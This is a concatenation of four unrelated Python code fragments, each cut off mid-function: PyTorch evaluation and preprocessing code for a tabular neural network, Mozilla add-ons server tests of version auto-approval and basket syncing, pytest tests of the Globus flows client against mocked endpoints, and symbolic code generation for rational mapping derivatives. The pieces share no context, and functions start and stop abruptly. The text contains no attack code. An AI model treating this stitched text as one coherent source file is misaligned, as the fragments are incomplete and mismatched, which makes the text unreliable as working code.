output = output.detach().cpu().numpy()
final_targets.append(targets)
final_outputs.append(output)
final_targets = np.concatenate(final_targets)
final_outputs = np.concatenate(final_outputs)
try:
mae = mean_absolute_error(final_targets, final_outputs)
maes = [mean_absolute_error(final_targets[:, i], final_outputs[:, i]) for i in range(4)]
except:
mae = None
maes = None
return final_outputs, final_targets, losses.avg, mae, maes
def preprocess_nn_2(
X: pd.DataFrame,
scaler: Optional[StandardScaler] = None,
scaler_type: str = 'standard'):
for c in X.columns:
X[f"{c}_isnull"] = X[c].isnull().astype(int)
cat_cols = [c for c in X.columns if c in CATEGORICAL_COLS.keys()]
num_cols = [c for c in X.columns if c not in cat_cols]
X_num = X[num_cols].values.astype(np.float32)
X_cat = np.nan_to_num(X[cat_cols].values.astype(np.int32))
if scaler is None:
if scaler_type == 'standard':
scaler = StandardScaler()
elif scaler_type == 'gauss':
scaler = QuantileTransformer(output_distribution="normal", n_quantiles=5000)
X_num = scaler.fit_transform(X_num)
X_num = np.nan_to_num(X_num)
return X_num, X_cat, cat_cols, scaler
else:
X_num = scaler.transform(X_num)
X_num = np.nan_to_num(X_num)
return X_num, X_cat, cat_cols
def predict_nn(X: pd.DataFrame,
model: Union[List[MLP], MLP],
scaler: StandardScaler,
device):
if not isinstance(model, list):
model = [model]
for m in model:
m.eval()
X_num, X_cat, cat_cols = preprocess_nn_2(X.copy(), scaler)
valid_dataset = TabularDataset(X_num, X_cat, None)
valid_loader = torch.utils.data.DataLoader(valid_dataset,
batch_size=512,
shuffle=False,
num_workers=4)
final_outputs = []
with torch.no_grad():
for x_num, x_cat in tqdm(valid_loader, position=0, leave=True, desc='Evaluating'):
x_num = x_num.to(device, dtype=torch.float)
x_cat = x_cat.to(device)
outputs = []
with torch.no_grad():
for m in model:
output = m(x_num, x_cat)
outputs.append(output.detach().cpu().numpy())
final_outputs.append(np.array(outputs).mean(axis=0))
final_outputs = np.concatenate(final_outputs)
return final_outputs
def train_nn(X: pd.DataFrame,
Ys: pd.DataFrame,
cv: TimeSeriesSplit,
df_train: pd.DataFrame,
pkl_path: str,
| |
addon=addon, version='0.2', file_kw={'status': amo.STATUS_DISABLED}
)
assert list(Version.objects.valid()) == [additional_version, self.version]
def test_unlisted_addon_get_url_path(self):
self.make_addon_unlisted(self.version.addon)
self.version.reload()
assert self.version.get_url_path() == ''
def test_source_upload_path(self):
addon = Addon.objects.get(id=3615)
version = version_factory(addon=addon, version='0.1')
uploaded_name = source_upload_path(version, 'foo.tar.gz')
assert uploaded_name.endswith('a3615-0.1-src.tar.gz')
def test_source_upload_path_utf8_chars(self):
addon = Addon.objects.get(id=3615)
addon.update(slug='crosswarpex-확장')
version = version_factory(addon=addon, version='0.1')
uploaded_name = source_upload_path(version, 'crosswarpex-확장.tar.gz')
assert uploaded_name.endswith('crosswarpex-확장-0.1-src.tar.gz')
def test_status_handles_invalid_status_id(self):
version = Addon.objects.get(id=3615).current_version
# When status is a valid one, one of STATUS_CHOICES_FILE return label.
assert version.status == [amo.STATUS_CHOICES_FILE[version.all_files[0].status]]
version.all_files[0].update(status=99) # 99 isn't a valid status.
# otherwise return the status code for reference.
assert version.status == ['[status:99]']
def test_is_ready_for_auto_approval(self):
addon = Addon.objects.get(id=3615)
version = addon.current_version
# Ensure the cached_property has not been set yet
assert 'is_ready_for_auto_approval' not in version.__dict__
# Test it.
assert not version.is_ready_for_auto_approval
# It should now be set
assert 'is_ready_for_auto_approval' in version.__dict__
del version.is_ready_for_auto_approval
version.files.all().update(
status=amo.STATUS_AWAITING_REVIEW, is_webextension=True
)
version.update(channel=amo.RELEASE_CHANNEL_LISTED)
# Ensure the cached_property has not been set yet
assert 'is_ready_for_auto_approval' not in version.__dict__
# Test it.
assert version.is_ready_for_auto_approval
# It should now be set
assert 'is_ready_for_auto_approval' in version.__dict__
del version.is_ready_for_auto_approval
version.files.all().update(is_webextension=False)
# Ensure the cached_property has not been set yet
assert 'is_ready_for_auto_approval' not in version.__dict__
# Test it.
assert not version.is_ready_for_auto_approval
# It should now be set
assert 'is_ready_for_auto_approval' in version.__dict__
del version.is_ready_for_auto_approval
version.files.all().update(is_webextension=True)
# Ensure the cached_property has not been set yet
assert 'is_ready_for_auto_approval' not in version.__dict__
# Test it.
assert version.is_ready_for_auto_approval
# It should now be set
assert 'is_ready_for_auto_approval' in version.__dict__
# With the auto-approval disabled flag set, it's still considered
# "ready", even though the auto_approve code won't approve it.
del version.is_ready_for_auto_approval
AddonReviewerFlags.objects.create(addon=addon, auto_approval_disabled=False)
# Ensure the cached_property has not been set yet
assert 'is_ready_for_auto_approval' not in version.__dict__
# Test it.
assert version.is_ready_for_auto_approval
# It should now be set
assert 'is_ready_for_auto_approval' in version.__dict__
del version.is_ready_for_auto_approval
addon.update(type=amo.ADDON_STATICTHEME)
# Ensure the cached_property has not been set yet
assert 'is_ready_for_auto_approval' not in version.__dict__
# Test it.
assert not version.is_ready_for_auto_approval
# It should now be set
assert 'is_ready_for_auto_approval' in version.__dict__
del version.is_ready_for_auto_approval
addon.update(type=amo.ADDON_LPAPP)
# Ensure the cached_property has not been set yet
assert 'is_ready_for_auto_approval' not in version.__dict__
# Test it.
assert version.is_ready_for_auto_approval
# It should now be set
assert 'is_ready_for_auto_approval' in version.__dict__
del version.is_ready_for_auto_approval
addon.update(type=amo.ADDON_DICT)
# Ensure the cached_property has not been set yet
assert 'is_ready_for_auto_approval' not in version.__dict__
# Test it.
assert version.is_ready_for_auto_approval
# It should now be set
assert 'is_ready_for_auto_approval' in version.__dict__
# Test with an unlisted version. Note that it's the only version, so
# the add-on status is reset to STATUS_NULL at this point.
del version.is_ready_for_auto_approval
version.update(channel=amo.RELEASE_CHANNEL_UNLISTED)
# Ensure the cached_property has not been set yet
assert 'is_ready_for_auto_approval' not in version.__dict__
# Test it.
assert version.is_ready_for_auto_approval
# It should now be set
assert 'is_ready_for_auto_approval' in version.__dict__
# Retest with an unlisted version again and the addon being approved or
# nominated
del version.is_ready_for_auto_approval
addon.reload()
addon.update(status=amo.STATUS_NOMINATED)
# Ensure the cached_property has not been set yet
assert 'is_ready_for_auto_approval' not in version.__dict__
# Test it.
assert version.is_ready_for_auto_approval
# It should now be set
assert 'is_ready_for_auto_approval' in version.__dict__
del version.is_ready_for_auto_approval
addon.update(status=amo.STATUS_APPROVED)
# Ensure the cached_property has not been set yet
assert 'is_ready_for_auto_approval' not in version.__dict__
# Test it.
assert version.is_ready_for_auto_approval
# It should now be set
assert 'is_ready_for_auto_approval' in version.__dict__
def test_is_ready_for_auto_approval_addon_status(self):
addon = Addon.objects.get(id=3615)
addon.status = amo.STATUS_NOMINATED
version = addon.current_version
version.files.all().update(
status=amo.STATUS_AWAITING_REVIEW, is_webextension=True
)
# Ensure the cached_property has not been set yet
assert 'is_ready_for_auto_approval' not in version.__dict__
# Test it.
assert version.is_ready_for_auto_approval
# It should now be set
assert 'is_ready_for_auto_approval' in version.__dict__
del version.is_ready_for_auto_approval
addon.update(status=amo.STATUS_DISABLED)
assert not version.is_ready_for_auto_approval
# It should now be set
assert 'is_ready_for_auto_approval' in version.__dict__
def test_transformer_auto_approvable(self):
addon = Addon.objects.get(id=3615)
version = addon.current_version
# Ensure the cached_property has not been set yet
assert 'is_ready_for_auto_approval' not in version.__dict__
# Test it.
assert not version.is_ready_for_auto_approval
# It should now be set
assert 'is_ready_for_auto_approval' in version.__dict__
del version.is_ready_for_auto_approval
version.files.all().update(
status=amo.STATUS_AWAITING_REVIEW, is_webextension=True
)
version.update(channel=amo.RELEASE_CHANNEL_LISTED)
# Ensure the cached_property has not been set yet
assert 'is_ready_for_auto_approval' not in version.__dict__
# Test it.
assert version.is_ready_for_auto_approval
# It should now be set
assert 'is_ready_for_auto_approval' in version.__dict__
del version.is_ready_for_auto_approval
version.files.all().update(is_webextension=False)
# Ensure the cached_property has not been set yet
assert 'is_ready_for_auto_approval' not in version.__dict__
# Test it.
assert not version.is_ready_for_auto_approval
# It should now be set
assert 'is_ready_for_auto_approval' in version.__dict__
del version.is_ready_for_auto_approval
version.files.all().update(is_webextension=True)
# Ensure the cached_property has not been set yet
assert 'is_ready_for_auto_approval' not in version.__dict__
# Test it.
assert version.is_ready_for_auto_approval
# It should now be set
assert 'is_ready_for_auto_approval' in version.__dict__
# With the auto-approval disabled flag set, it's still considered
# "ready", even though the auto_approve code won't approve it.
del version.is_ready_for_auto_approval
AddonReviewerFlags.objects.create(addon=addon, auto_approval_disabled=False)
# Ensure the cached_property has not been set yet
assert 'is_ready_for_auto_approval' not in version.__dict__
# Set it.
Version.transformer_auto_approvable([version])
# It should now be set
assert 'is_ready_for_auto_approval' in version.__dict__
# Test it.
assert version.is_ready_for_auto_approval
del version.is_ready_for_auto_approval
addon.update(type=amo.ADDON_STATICTHEME)
# Ensure the cached_property has not been set yet
assert 'is_ready_for_auto_approval' not in version.__dict__
# Set it.
Version.transformer_auto_approvable([version])
# It should now be set
assert 'is_ready_for_auto_approval' in version.__dict__
# Test it.
assert not version.is_ready_for_auto_approval
del version.is_ready_for_auto_approval
addon.update(type=amo.ADDON_LPAPP)
# Ensure the cached_property has not been set yet
assert 'is_ready_for_auto_approval' not in version.__dict__
# Set it.
Version.transformer_auto_approvable([version])
# It should now be set
assert 'is_ready_for_auto_approval' in version.__dict__
# Test it.
assert version.is_ready_for_auto_approval
del version.is_ready_for_auto_approval
addon.update(type=amo.ADDON_DICT)
# Ensure the cached_property has not been set yet
assert 'is_ready_for_auto_approval' not in version.__dict__
# Set it.
Version.transformer_auto_approvable([version])
# It should now be set
assert 'is_ready_for_auto_approval' in version.__dict__
# Test it.
assert version.is_ready_for_auto_approval
# Test with an unlisted version. Note that it's the only version, so
# the add-on status is reset to STATUS_NULL at this point.
del version.is_ready_for_auto_approval
version.update(channel=amo.RELEASE_CHANNEL_UNLISTED)
# Ensure the cached_property has not been set yet
assert 'is_ready_for_auto_approval' not in version.__dict__
# Set it.
Version.transformer_auto_approvable([version])
# It should now be set
assert 'is_ready_for_auto_approval' in version.__dict__
# Test it.
assert version.is_ready_for_auto_approval
# Retest with an unlisted version again and the addon being approved or
# nominated
del version.is_ready_for_auto_approval
addon.reload()
addon.update(status=amo.STATUS_NOMINATED)
# Ensure the cached_property has not been set yet
assert 'is_ready_for_auto_approval' not in version.__dict__
# Set it.
Version.transformer_auto_approvable([version])
# It should now be set
assert 'is_ready_for_auto_approval' in version.__dict__
# Test it.
assert version.is_ready_for_auto_approval
del version.is_ready_for_auto_approval
addon.update(status=amo.STATUS_APPROVED)
# Ensure the cached_property has not been set yet
assert 'is_ready_for_auto_approval' not in version.__dict__
# Set it.
Version.transformer_auto_approvable([version])
# It should now be set
assert 'is_ready_for_auto_approval' in version.__dict__
# Test it.
assert version.is_ready_for_auto_approval
def test_was_auto_approved(self):
addon = Addon.objects.get(id=3615)
version = addon.current_version
assert not version.was_auto_approved
AutoApprovalSummary.objects.create(version=version, verdict=amo.AUTO_APPROVED)
assert version.was_auto_approved
version.files.update(status=amo.STATUS_AWAITING_REVIEW)
del version.all_files # Reset all_files cache.
assert not version.was_auto_approved
@mock.patch('olympia.amo.tasks.trigger_sync_objects_to_basket')
def test_version_field_changes_not_synced_to_basket(
self, trigger_sync_objects_to_basket_mock
):
addon = Addon.objects.get(id=3615)
version = addon.current_version
version.update(
approval_notes='Flôp',
reviewed=self.days_ago(1),
nomination=self.days_ago(2),
version='1.42',
)
assert trigger_sync_objects_to_basket_mock.call_count == 0
@mock.patch('olympia.amo.tasks.trigger_sync_objects_to_basket')
def test_version_promoted_changes_synced_to_basket(
self, trigger_sync_objects_to_basket_mock
):
addon = Addon.objects.get(id=3615)
PromotedApproval.objects.create(
version=addon.current_version,
group_id=RECOMMENDED.id,
application_id=amo.FIREFOX.id,
)
assert trigger_sync_objects_to_basket_mock.call_count == 1
trigger_sync_objects_to_basket_mock.assert_called_with(
'addon', [addon.pk], 'promoted change'
)
@mock.patch('olympia.amo.tasks.trigger_sync_objects_to_basket')
def test_unlisted_version_deleted_synced_to_basket(
self, trigger_sync_objects_to_basket_mock
):
addon = Addon.objects.get(id=3615)
version = addon.current_version
version.update(channel=amo.RELEASE_CHANNEL_UNLISTED)
trigger_sync_objects_to_basket_mock.reset_mock()
version.delete()
assert trigger_sync_objects_to_basket_mock.call_count == 1
trigger_sync_objects_to_basket_mock.assert_called_with(
'addon', [addon.pk], 'unlisted version deleted'
)
@mock.patch('olympia.amo.tasks.trigger_sync_objects_to_basket')
def test_version_deleted_not_synced_to_basket(
self, trigger_sync_objects_to_basket_mock
):
addon = Addon.objects.get(id=3615)
# We need to create a new version, if we delete current_version this
# would be synced to basket because _current_version would change.
new_version = version_factory(
addon=addon, file_kw={'status': amo.STATUS_NOMINATED}
)
new_version.delete()
assert trigger_sync_objects_to_basket_mock.call_count == 0
def test_promoted_can_be_disabled_and_deleted(self):
addon = Addon.objects.get(id=3615)
# A non-promoted addon can have it's versions disabled.
assert addon.current_version.can_be_disabled_and_deleted()
self.make_addon_promoted(addon, RECOMMENDED, approve_version=True)
addon = addon.reload()
assert addon.promoted_group() == RECOMMENDED
# But a promoted one, that's in a prereview group, can't be disabled
assert not addon.current_version.can_be_disabled_and_deleted()
previous_version = addon.current_version
version_factory(addon=addon, promotion_approved=True)
addon = addon.reload()
assert previous_version != addon.current_version
assert addon.current_version.promoted_approvals.filter(
group_id=RECOMMENDED.id
).exists()
assert previous_version.promoted_approvals.filter(
group_id=RECOMMENDED.id
).exists()
# unless the previous version is also approved for the same group
assert addon.current_version.can_be_disabled_and_deleted()
assert previous_version.can_be_disabled_and_deleted()
# double-check by changing the approval of previous version
previous_version.promoted_approvals.update(group_id=LINE.id)
assert not addon.current_version.can_be_disabled_and_deleted()
previous_version.promoted_approvals.update(group_id=RECOMMENDED.id)
# Check the scenario when some of the previous versions are approved
# but not the most recent previous - | |
import json
import os
import pathlib
import urllib.parse
from typing import Any, Dict, Union, cast
from unittest.mock import Mock
import pytest
import yaml
from globus_automate_client import flows_client
VALID_FLOW_DEFINITION = {
"StartAt": "perfect",
"States": {
"perfect": {
"Type": "Pass",
"End": True,
},
},
}
@pytest.fixture
def fc():
client = flows_client.FlowsClient("client", flows_client.AccessTokenAuthorizer)
original_authorizer = client.authorizer
yield client
assert client.authorizer is original_authorizer
@pytest.mark.parametrize(
"d, names, stop_names, expected, message",
(
# Empty inputs and outputs
({}, set(), None, set(), "nothing should be returned"),
({}, {"i"}, None, set(), "nothing should be returned"),
({}, set(), {"x"}, set(), "nothing should be returned"),
({}, {"i"}, {"x"}, set(), "nothing should be returned"),
({"i": "1"}, set(), None, set(), "nothing should be returned"),
({"i": 123}, {"i"}, None, set(), "nothing should be returned"),
({"i": [123]}, {"i"}, None, set(), "nothing should be returned"),
({"x": "1"}, {"i"}, None, set(), "nothing should be returned"),
({"x": "1"}, set(), {"x"}, set(), "nothing should be returned"),
#
# Corner case behavior
({"x": "1"}, {"x"}, {"x"}, {"1"}, "failed to find str (corner case)"),
#
# Test includes
({"i": "1"}, {"i"}, None, {"1"}, "failed to find top-level str"),
({"i": {"i": "1"}}, {"i"}, None, {"1"}, "failed to find str in dict"),
({"i": ["1"]}, {"i"}, None, {"1"}, "failed to find str in list"),
({"i": ["1", "2"]}, {"i"}, None, {"1", "2"}, "failed to find values in list"),
({"i": ["1", {"i": "2"}]}, {"i"}, None, {"1", "2"}, "failed to find values"),
({"i": [{"i": "1"}]}, {"i"}, None, {"1"}, "failed to find str in list->dict"),
#
# Test excludes
({"x": {"i": "1"}}, {"i"}, {"x"}, set(), "found str in excluded dict"),
),
)
def test_all_vals_for_keys(d, names, stop_names, expected, message):
"""Validate values are found or ignored correctly."""
assert flows_client._all_vals_for_keys(names, d, stop_names) == expected, message
def test_validate_flow_definition_valid():
"""Confirm that valid and well-formed schema raise no errors."""
flows_client.validate_flow_definition(VALID_FLOW_DEFINITION)
def test_validate_flow_definition_multiple_validity_errors():
"""Confirm that validity checks can report multiple errors."""
schema = {
# "StartAt" is missing
"States": {
"bogus": {},
},
}
with pytest.raises(flows_client.FlowValidationError) as raised:
flows_client.validate_flow_definition(schema)
assert "'StartAt' is a required property" in raised.value.args[0]
assert "'States.bogus'" in raised.value.args[0]
def test_validate_flow_definition_multiple_ill_formed_errors():
"""Confirm that well-formed checks can report multiple errors."""
schema = {
"StartAt": "undefined",
"States": {
"unreferenced": {
"Type": "Pass",
"End": True,
},
},
}
with pytest.raises(flows_client.FlowValidationError) as raised:
flows_client.validate_flow_definition(schema)
assert "not referenced" in raised.value.args[0]
assert "not defined" in raised.value.args[0]
input_schemas = pathlib.Path(__file__).parent.rglob("../examples/**/*schema.*")
@pytest.mark.parametrize("filename", input_schemas)
def test_validate_input_schema(filename):
"""Confirm that example input schemas all validate correctly."""
if "invalid" in filename.name:
pytest.xfail(f"{filename} is invalid according to its filename")
with filename.open() as file:
if filename.suffix == ".json":
schema = json.load(file)
else: # filename.suffix == ".yaml"
schema = yaml.safe_load(file)
flows_client.validate_input_schema(schema)
@pytest.mark.parametrize("schema", (None, set()))
def test_validate_input_schema_bad_type(schema):
"""Confirm that a bad input type results in failures."""
with pytest.raises(flows_client.FlowValidationError):
flows_client.validate_input_schema(schema)
def test_validate_input_schema_multiple_failures():
"""Confirm that an invalid schema can report multiple errors."""
schema = {
"properties": {
"trouble": {
"type": "bogus",
},
},
"required": False,
}
with pytest.raises(flows_client.FlowValidationError) as raised:
flows_client.validate_input_schema(schema)
assert "'properties.trouble.type' invalid" in raised.value.args[0]
assert "'required' invalid" in raised.value.args[0]
@pytest.mark.parametrize(
"value, expected",
(
(None, "https://flows.globus.org"),
("prod", "https://flows.globus.org"),
("bogus", ValueError),
),
)
def test_get_flows_base_url_for_environment_known(monkeypatch, value, expected):
"""Verify that env variables and base URL's are associated correctly."""
monkeypatch.setattr(os.environ, "get", lambda x: value)
if expected is ValueError:
with pytest.raises(ValueError):
flows_client._get_flows_base_url_for_environment()
else:
assert flows_client._get_flows_base_url_for_environment() == expected
def test_deploy_flow_data_construction(fc, mocked_responses):
"""Verify the flow JSON data is constructed correctly."""
mocked_responses.add("POST", "https://flows.api.globus.org/flows")
expected: Dict[str, Union[str, Dict[str, Any]]] = {
"definition": VALID_FLOW_DEFINITION,
"input_schema": {"Comment": "flow-input-schema"},
"title": "--title--",
"subtitle": "--subtitle--",
"description": "--description--",
"keywords": "--keywords--",
"flow_viewers": ["--flow_viewers--"],
"flow_starters": ["--flow_starters--"],
"flow_administrators": ["--flow_administrators--"],
"subscription_id": "--subscription_id--",
}
fc.deploy_flow(
# Arguments that affect the JSON data
flow_definition=expected["definition"],
input_schema=expected["input_schema"],
title=expected["title"],
subtitle=expected["subtitle"],
description=expected["description"],
keywords=expected["keywords"],
flow_viewers=expected["flow_viewers"],
flow_starters=expected["flow_starters"],
flow_administrators=expected["flow_administrators"],
subscription_id=expected["subscription_id"],
# Other arguments
validate_definition=True,
validate_schema=True,
dry_run=False,
)
data = json.loads(mocked_responses.calls[0].request.body)
assert data == expected
@pytest.mark.parametrize("input_schema, expected", ((None, False), ({}, True)))
def test_deploy_flow_only_exclude_input_schema_if_none(
fc, mocked_responses, input_schema, expected
):
"""Verify the *input_schema* is not excluded even if it's false-y."""
mocked_responses.add("POST", "https://flows.api.globus.org/flows")
fc.deploy_flow(
# Included arguments
flow_definition=VALID_FLOW_DEFINITION,
title="--title--",
input_schema=input_schema,
# Excluded arguments
subtitle="",
description=None,
# Other arguments
validate_definition=False,
validate_schema=False,
dry_run=False,
)
data = json.loads(mocked_responses.calls[0].request.body)
assert "subtitle" not in data
assert "description" not in data
assert ("input_schema" in data) is expected
@pytest.mark.parametrize("dry_run, path", ((False, "flows"), (True, "flows/dry-run")))
def test_deploy_flow_dry_run(fc, mocked_responses, dry_run, path):
"""Verify the *dry_run* parameter affects the URL path."""
url = f"https://flows.api.globus.org/{path}"
mocked_responses.add("POST", url)
fc.deploy_flow(
flow_definition=VALID_FLOW_DEFINITION,
title="bogus",
validate_schema=False,
dry_run=dry_run,
)
assert mocked_responses.calls[0].request.url == url
def test_deploy_flow_aliases(fc, mocked_responses):
"""Verify that viewer/starter/admin aliases are still supported."""
mocked_responses.add("POST", "https://flows.api.globus.org/flows")
fc.deploy_flow(
# Flow viewers and aliases
flow_viewers=["v1", "v2"],
visible_to=["v3"],
viewers=["v4"],
# Flow starters and aliases
flow_starters=["s1", "s2"],
runnable_by=["s3"],
starters=["s4"],
# Flow admins and aliases
flow_administrators=["a1", "a2"],
administered_by=["a3"],
administrators=["a4"],
# Everything below is mandatory but irrelevant to this test.
flow_definition=VALID_FLOW_DEFINITION,
title="",
validate_definition=False,
validate_schema=False,
)
data = json.loads(mocked_responses.calls[0].request.body)
assert set(data["flow_viewers"]) == {"v1", "v2", "v3", "v4"}
assert set(data["flow_starters"]) == {"s1", "s2", "s3", "s4"}
assert set(data["flow_administrators"]) == {"a1", "a2", "a3", "a4"}
@pytest.mark.parametrize("method", ("deploy_flow", "update_flow"))
def test_invalid_flow_definition_failure(fc, method):
"""Verify that an invalid flow definition triggers a failure."""
with pytest.raises(flows_client.FlowValidationError):
getattr(fc, method)(
flow_id="bogus-id",
flow_definition={"bogus": True},
title="title",
validate_definition=True,
)
@pytest.mark.parametrize("method", ("deploy_flow", "update_flow"))
def test_invalid_input_schema_failure(fc, method):
"""Verify that an invalid input schema triggers a failure."""
with pytest.raises(flows_client.FlowValidationError):
getattr(fc, method)(
flow_id="bogus-id",
flow_definition=VALID_FLOW_DEFINITION,
input_schema={"required": False},
title="title",
validate_definition=False,
validate_schema=True,
)
def test_update_flow_data_construction(fc, mocked_responses):
"""Verify the flow JSON data is constructed correctly."""
mocked_responses.add("PUT", "https://flows.api.globus.org/flows/bogus")
expected: Dict[str, Union[str, Dict[str, Any]]] = {
"definition": VALID_FLOW_DEFINITION,
"input_schema": {"Comment": "flow-input-schema"},
"title": "--title--",
"subtitle": "--subtitle--",
"description": "--description--",
"keywords": "--keywords--",
"flow_viewers": ["--flow_viewers--"],
"flow_starters": ["--flow_starters--"],
"flow_administrators": ["--flow_administrators--"],
"subscription_id": "--subscription_id--",
}
fc.update_flow(
# Arguments that affect the JSON data
flow_id="bogus",
flow_definition=expected["definition"],
input_schema=expected["input_schema"],
title=expected["title"],
subtitle=expected["subtitle"],
description=expected["description"],
keywords=expected["keywords"],
flow_viewers=expected["flow_viewers"],
flow_starters=expected["flow_starters"],
flow_administrators=expected["flow_administrators"],
subscription_id=expected["subscription_id"],
# Other arguments
validate_definition=True,
validate_schema=True,
)
data = json.loads(mocked_responses.calls[0].request.body)
assert data == expected
@pytest.mark.parametrize("input_schema, expected", ((None, False), ({}, True)))
def test_update_flow_exclude_most_false_values(
fc, mocked_responses, input_schema, expected
):
"""Verify the *input_schema* is not excluded even if it's false-y."""
mocked_responses.add("PUT", "https://flows.api.globus.org/flows/bogus")
fc.update_flow(
# *input_schema* is being tested for inclusion/exclusion.
input_schema=input_schema,
# These are false-y and will always be excluded.
subtitle="",
description=None,
# Mandatory arguments, but not under test.
flow_id="bogus",
flow_definition=VALID_FLOW_DEFINITION,
title="--title--",
validate_definition=False,
validate_schema=False,
)
data = json.loads(mocked_responses.calls[0].request.body)
assert "subtitle" in data
assert "description" not in data
assert ("input_schema" in data) is expected
def test_update_flow_aliases(fc, mocked_responses):
"""Verify that viewer/starter/admin aliases are still supported."""
mocked_responses.add("PUT", "https://flows.api.globus.org/flows/bogus")
fc.update_flow(
# Flow viewers and aliases
flow_viewers=["v1", "v2"],
visible_to=["v3"],
viewers=["v4"],
# Flow starters and aliases
flow_starters=["s1", "s2"],
runnable_by=["s3"],
starters=["s4"],
# Flow admins and aliases
flow_administrators=["a1", "a2"],
administered_by=["a3"],
administrators=["a4"],
# Everything below is mandatory but irrelevant to this test.
flow_id="bogus",
flow_definition=VALID_FLOW_DEFINITION,
title="",
validate_definition=False,
validate_schema=False,
)
data = json.loads(mocked_responses.calls[0].request.body)
assert set(data["flow_viewers"]) == {"v1", "v2", "v3", "v4"}
assert set(data["flow_starters"]) == {"s1", "s2", "s3", "s4"}
assert set(data["flow_administrators"]) == {"a1", "a2", "a3", "a4"}
def test_get_flow(fc, mocked_responses):
"""Verify the URL that is used to get a flow definition."""
url = "https://flows.api.globus.org/flows/bogus"
mocked_responses.add("GET", url)
fc.get_flow("bogus")
assert mocked_responses.calls[0].request.url == url
@pytest.mark.parametrize(
"role, roles, expected, message",
(
(None, None, {}, "parameters incorrectly included"),
# role
("", None, {}, "false-y *role* must not be included"),
("1", None, {"filter_role": "1"}, "*role* must be included"),
# roles
(None, tuple(), {}, "false-y *roles* must not be included"),
(None, ("2", "3"), {"filter_roles": "2,3"}, "*roles* must be included"),
# Precedence
("1", ("2", "3"), {"filter_role": "1"}, "*role* must override *roles*"),
),
)
def test_list_flows_role_precedence(
fc, mocked_responses, role, roles, expected, message
):
"""Verify the *role* and *roles* precedence rules."""
mocked_responses.add("GET", "https://flows.api.globus.org/flows")
fc.list_flows(role=role, roles=roles)
query: str = urllib.parse.urlparse(mocked_responses.calls[0].request.url).query
data = dict(urllib.parse.parse_qsl(query, keep_blank_values=True))
for key in ("filter_role", "filter_roles"):
if key in expected:
assert key in data, message
assert data[key] == expected[key], f"*{key}* value does not match"
else:
assert key not in data, message
@pytest.mark.parametrize(
"marker, per_page, expected, message",
(
(None, None, {}, "parameters incorrectly included"),
# marker
("", None, {}, "false-y *marker* must not be included"),
("m", None, {"pagination_token": "m"}, "*marker* must be included"),
# per_page
(None, 0, {}, "false-y *per_page* must not be included"),
(None, 10, {"per_page": "10"}, "*per_page* must be included"),
# Precedence
("m", 10, {"pagination_token": "m"}, "*marker* must override *per_page*"),
),
)
def test_list_flows_pagination_parameters(
fc, mocked_responses, marker, per_page, expected, message
):
"""Verify *marker* and *per_page* precedence rules."""
mocked_responses.add("GET", "https://flows.api.globus.org/flows")
fc.list_flows(marker=marker, per_page=per_page)
query: str = urllib.parse.urlparse(mocked_responses.calls[0].request.url).query
data = dict(urllib.parse.parse_qsl(query, keep_blank_values=True))
for key in ("pagination_token", "per_page"):
if key in expected:
assert key in data, message
assert data[key] == expected[key], f"*{key}* value does not match"
else:
assert key not in data, message
def test_list_flows_filters(fc, mocked_responses):
"""Verify that filters are applied to the query parameters."""
mocked_responses.add("GET", "https://flows.api.globus.org/flows")
fc.list_flows(role="role", filters={"1": "2", "filter_role": "bogus"})
query: str = | |
dim = space.ldim
ops = _logical_partial_derivatives[:dim]
# ... mapping components and their derivatives
components = [M[i] for i in range(0, dim)]
elements = list(components)
if nderiv > 0:
elements += [d(M[i]) for d in ops for i in range(0, dim)]
if nderiv > 1:
elements += [d1(d2(M[i])) for e,d1 in enumerate(ops)
for d2 in ops[:e+1]
for i in range(0, dim)]
if nderiv > 2:
raise NotImplementedError('TODO')
# ...
# ... weights and their derivatives
# TODO check if 'w' exist already
weights = element_of(space, name='w')
weights_elements = [weights]
if nderiv > 0:
weights_elements += [d(weights) for d in ops]
if nderiv > 1:
weights_elements += [d1(d2(weights)) for e,d1 in enumerate(ops)
for d2 in ops[:e+1]]
if nderiv > 2:
raise NotImplementedError('TODO')
# ...
stmts = []
# declarations
stmts += [Comment('declarations')]
for atom in elements + weights_elements:
atom_name = SymbolicExpr(atom).name
val_name = atom_name + '_values'
val = IndexedBase(val_name)[indices_quad]
stmt = Assign(atom_name, val)
stmts += [stmt]
# assignements
stmts += [Comment('rationalize')]
# 0 order terms
for i in range(dim):
w = SymbolicExpr(weights)
u = SymbolicExpr(M[i])
val_name = u.name + '_values'
val = IndexedBase(val_name)[indices_quad]
stmt = Assign(val, u / w )
stmts += [stmt]
# 1 order terms
if nderiv >= 1:
for d in ops:
w = SymbolicExpr( weights )
dw = SymbolicExpr(d(weights))
for i in range(dim):
u = SymbolicExpr( M[i] )
du = SymbolicExpr(d(M[i]))
val_name = du.name + '_values'
val = IndexedBase(val_name)[indices_quad]
stmt = Assign(val, du / w - u * dw / w**2 )
stmts += [stmt]
# 2 order terms
if nderiv >= 2:
for e, d1 in enumerate(ops):
for d2 in ops[:e+1]:
w = SymbolicExpr( weights )
d1w = SymbolicExpr( d1(weights) )
d2w = SymbolicExpr( d2(weights) )
d1d2w = SymbolicExpr(d1(d2(weights)))
for i in range(dim):
u = SymbolicExpr( M[i] )
d1u = SymbolicExpr( d1(M[i]) )
d2u = SymbolicExpr( d2(M[i]) )
d1d2u = SymbolicExpr(d1(d2(M[i])))
val_name = d1d2u.name + '_values'
val = IndexedBase(val_name)[indices_quad]
stmt = Assign(val,
d1d2u / w - u * d1d2w / w**2
- d1w * d2u / w**2 - d2w * d1u / w**2
+ 2 * u * d1w * d2w / w**3)
stmts += [stmt]
return stmts
#==============================================================================
def filter_product(indices, args, boundary):
mask = []
ext = []
if boundary:
if isinstance(boundary, Boundary):
mask = [boundary.axis]
ext = [boundary.ext]
else:
raise TypeError
# discrete_boundary gives the perpendicular indices, then we need to
# remove them from directions
dim = len(indices)
args = [args[i][indices[i]] for i in range(dim) if not(i in mask)]
return Mul(*args)
#==============================================================================
# TODO remove it later
def filter_loops(indices, ranges, body, boundary, boundary_basis=False):
quad_mask = []
quad_ext = []
if boundary:
if isinstance(boundary, Boundary):
quad_mask = [boundary.axis]
quad_ext = [boundary.ext]
else:
raise TypeError
# discrete_boundary gives the perpendicular indices, then we need to
# remove them from directions
dim = len(indices)
for i in range(dim-1,-1,-1):
rx = ranges[i]
x = indices[i]
start = rx.start
end = rx.stop
if i in quad_mask:
i_index = quad_mask.index(i)
ext = quad_ext[i_index]
if ext == -1:
end = start + 1
elif ext == 1:
start = end - 1
else:
raise ValueError('> Wrong value for ext. It should be -1 or 1')
rx = Range(start, end)
body = [For(x, rx, body)]
